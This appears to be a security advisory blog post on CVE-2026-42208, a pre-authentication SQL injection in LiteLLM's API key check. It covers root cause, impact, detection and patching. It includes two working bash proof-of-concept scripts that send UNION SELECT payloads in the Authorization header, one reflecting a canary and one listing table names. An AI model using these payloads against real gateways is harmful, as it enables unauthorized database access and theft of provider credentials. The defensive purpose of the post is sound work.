top of page
Search

CVE-2026-42208 and the LiteLLM Authorization Header SQL Injection

  • Writer: ninp0
    ninp0
  • 11 minutes ago
  • 6 min read

ABSTRACT

CVE-2026-42208 is a critical pre-authentication SQL injection in LiteLLM, the popular open-source LLM gateway used to broker access to providers such as OpenAI, Anthropic, and Amazon Bedrock. The defect sits in proxy API key verification, where the Authorization: Bearer value was mixed into SQL text instead of being passed as a parameter. That mistake gives unauthenticated attackers a path to arbitrary SELECT operations against the LiteLLM backend database.


The business significance is unusually high because AI gateways centralize the exact secrets attackers want most: provider credentials, virtual API keys, master keys, environment configuration, and model-routing policy. Public reporting shows exploitation attempts started roughly 36 hours after the advisory reached the GitHub Advisory Database, with operators going directly after LiteLLM tables tied to keys and configuration. In other words, this is not just another SQL injection story. It is a direct path from internet reachability to AI infrastructure secrets.


EXECUTIVE SUMMARY

GitHub rates CVE-2026-42208 as Critical with a CVSS v4 score of 9.3. Affected versions are LiteLLM 1.81.16 through 1.83.6, with the fix shipping in 1.83.7 and later. The official workaround, when immediate patching is impossible, is to set disable_error_logs: true under general_settings to remove the vulnerable error-handling path.


What makes the flaw operationally urgent is the blend of pre-auth reachability and secret concentration. LiteLLM commonly stores virtual tenant keys, upstream provider credentials, database connection material, callback destinations, and policy configuration in the same control plane. Public threat reporting from Sysdig describes attackers enumerating LiteLLM-specific schema details, targeting the verification-token table, credentials table, and configuration records that can reveal environment variables. Even a short exposure window can be enough for lasting downstream compromise if those secrets are reused elsewhere.


AFFECTED CONDITIONS

  • LiteLLM versions greater than or equal to 1.81.16 and lower than 1.83.7 are affected according to the GitHub security advisory.

  • The vulnerable path is reachable through LLM API routes such as POST /chat/completions, because proxy key verification executes before the request is forwarded upstream.

  • The attacker does not need valid LiteLLM credentials. The vulnerable input is the caller-controlled Authorization: Bearer value.

  • Internet-facing LiteLLM proxies are the highest-risk deployments, especially where the gateway stores real provider credentials or centrally brokers traffic for multiple internal teams.


ROOT CAUSE AND ATTACK PATH

LiteLLM performs proxy API key verification against its backend database. In affected builds, a database query used the caller-supplied bearer token by interpolating it into SQL text rather than binding it as a parameter. That turns a normal authentication check into a SQL injection surface. Because the request reaches this logic before a valid key is required, the issue is pre-authentication by design rather than a post-auth escalation bug.


Public reporting indicates the most straightforward exploitation path is UNION-based injection delivered via the Authorization header. The response path then leaks attacker-selected query output back through the application. Sysdig observed payloads targeted at LiteLLM_VerificationToken, litellm_credentials, and litellm_config, which is consistent with an operator who already understood LiteLLM's schema and went straight after the highest-value records.


The attack path matters because LiteLLM is not a passive application. It often has standing authority to call expensive or sensitive upstream AI services on behalf of many users and applications. A read primitive against the gateway database can therefore become a pivot into model-provider billing abuse, data exposure, shadow model invocation, webhook compromise, or later movement into other internal services referenced by environment variables and callbacks.


BUSINESS IMPACT

  • Provider credential theft: attackers can potentially extract OpenAI, Anthropic, Bedrock, or other upstream API credentials stored by the gateway.

  • Tenant impersonation: virtual API keys from LiteLLM can allow attackers to masquerade as internal applications or customers.

  • Operational blind spots: policy, budget, and logging settings held by the gateway can be studied or altered to hide abuse and increase spend.

  • Broader secret spillover: environment-variable configuration often contains database DSNs, master keys, callback endpoints, and cache or queue credentials that extend the blast radius beyond LiteLLM itself.


PUBLIC POC AND VALIDATION REFERENCES

There was no broadly circulated turnkey GitHub exploit repository visible at draft time, but there is already enough public material for defenders to validate the issue and understand how real operators are probing it. The most useful sources are below:

The absence of a mass-exploit repo should not be mistaken for safety. The public payload examples and schema-aware targeting published by Sysdig are already more than enough for a capable adversary to reproduce the bug against exposed LiteLLM instances.


ORIGINAL 0DAY INC LAB-ONLY POC A: CONTROLLED CANARY INJECTION

The first 0day Inc PoC is intentionally conservative. It attempts to reflect a harmless literal value, 0DAY_CANARY, through the vulnerable query path on a LiteLLM instance you own or are explicitly authorized to test. This demonstrates arbitrary UNION output without touching real keys, credentials, or application data.

#!/usr/bin/env bash
set -euo pipefail

BASE_URL="${1:?usage: $0 https://litellm.lab}"
OUT="${OUT:-litellm-canary-response.txt}"
HDRS="${HDRS:-litellm-canary-headers.txt}"
PAYLOAD=${PAYLOAD:-"sk-litellm' UNION SELECT '0DAY_CANARY',NULL,NULL,NULL,NULL-- "}

curl -skS -D "$HDRS" -o "$OUT" \
  -X POST "${BASE_URL%/}/chat/completions" \
  -H "Authorization: Bearer ${PAYLOAD}" \
  -H "Content-Type: application/json" \
  --data "{"model":"gpt-4o-mini","messages":[{"role":"user","content":"ping"}]}" || true

echo "[*] response headers -> $HDRS"
echo "[*] response body    -> $OUT"
grep -n "0DAY_CANARY" "$OUT" && echo "[HIT] Canary value returned in application output" || echo "[INFO] Canary not reflected; inspect body and server logs in your lab"

Interpretation: if the canary value appears in the response body or associated server-side output in your lab, you have confirmed the injection path. At that point there is no need to escalate to credential extraction in order to prove risk.


ORIGINAL 0DAY INC LAB-ONLY POC B: METADATA-ONLY SCHEMA VALIDATION

The second 0day Inc PoC checks whether a vulnerable LiteLLM instance can be coerced into disclosing the names of high-value tables from information_schema. This is a safer way to confirm that the attack path can reach LiteLLM-specific data structures without retrieving actual credential material.

#!/usr/bin/env bash
set -euo pipefail

BASE_URL="${1:?usage: $0 https://litellm.lab}"
OUT="${OUT:-litellm-schema-check.txt}"
HDRS="${HDRS:-litellm-schema-headers.txt}"
PAYLOAD=${PAYLOAD:-"sk-litellm' UNION SELECT string_agg(table_name, ','),NULL,NULL,NULL,NULL FROM information_schema.tables WHERE lower(table_name) IN ('litellm_verificationtoken','litellm_credentials','litellm_config')-- "}

curl -skS -D "$HDRS" -o "$OUT" \
  -X POST "${BASE_URL%/}/chat/completions" \
  -H "Authorization: Bearer ${PAYLOAD}" \
  -H "Content-Type: application/json" \
  --data "{"model":"gpt-4o-mini","messages":[{"role":"user","content":"ping"}]}" || true

echo "[*] response headers -> $HDRS"
echo "[*] response body    -> $OUT"
grep -Eo "LiteLLM_VerificationToken|litellm_credentials|litellm_config" "$OUT" | sort -u || echo "[INFO] Table names not reflected; review body/logs in your lab"

Interpretation: if table names such as LiteLLM_VerificationToken, litellm_credentials, or litellm_config are returned or echoed into logs, defenders have enough evidence to treat the gateway as exposed and move immediately to patching and secret rotation.


DETECTION AND HUNTING

  • Search reverse-proxy and application logs for Authorization headers containing single quotes, UNION SELECT, or strings resembling sk-litellm'.

  • Hunt for requests to /chat/completions, /key/info, and /key/generate from unexpected sources, especially where the user agent resembles Python/3.12 aiohttp/3.9.1 as described by Sysdig.

  • Review database logs for unusual UNION queries or references to LiteLLM_VerificationToken, litellm_credentials, and litellm_config outside normal application behavior.

  • Monitor upstream AI-provider billing and usage for sudden spikes, new source IPs, or model calls that do not align with known application patterns.

  • If an internet-facing LiteLLM instance ran in the affected range, investigate whether environment-variable configuration, webhooks, or callback secrets need to be treated as exposed.


MITIGATION PRIORITIES

  • Upgrade LiteLLM immediately to version 1.83.7 or later.

  • If emergency patching is delayed, set disable_error_logs: true under general_settings as the vendor-published workaround and reduce internet exposure at the same time.

  • Rotate virtual API keys, master keys, upstream provider credentials, and any secrets referenced by litellm_config or environment variables if the instance was reachable while vulnerable.

  • Place LiteLLM behind trusted internal networks or authenticated reverse proxies; an internet-facing AI gateway should be treated as a privileged asset, not a convenience endpoint.

  • Add detection around malformed Authorization headers and create billing or usage alerts for unexplained provider consumption after the exposure window.


REFERENCES

Bottom line: CVE-2026-42208 is the kind of bug defenders should assume will be operationalized quickly because it sits on the front door of a secret-dense AI control plane. If your LiteLLM proxy was exposed in the affected range, the right response is not just patching. It is patching, containment, credential rotation, and verification that your model-provider trust chain was not quietly inherited by someone else.

 
 
 
0day Inc.

"world-class security solutions for a brighter tomorrow"

bottom of page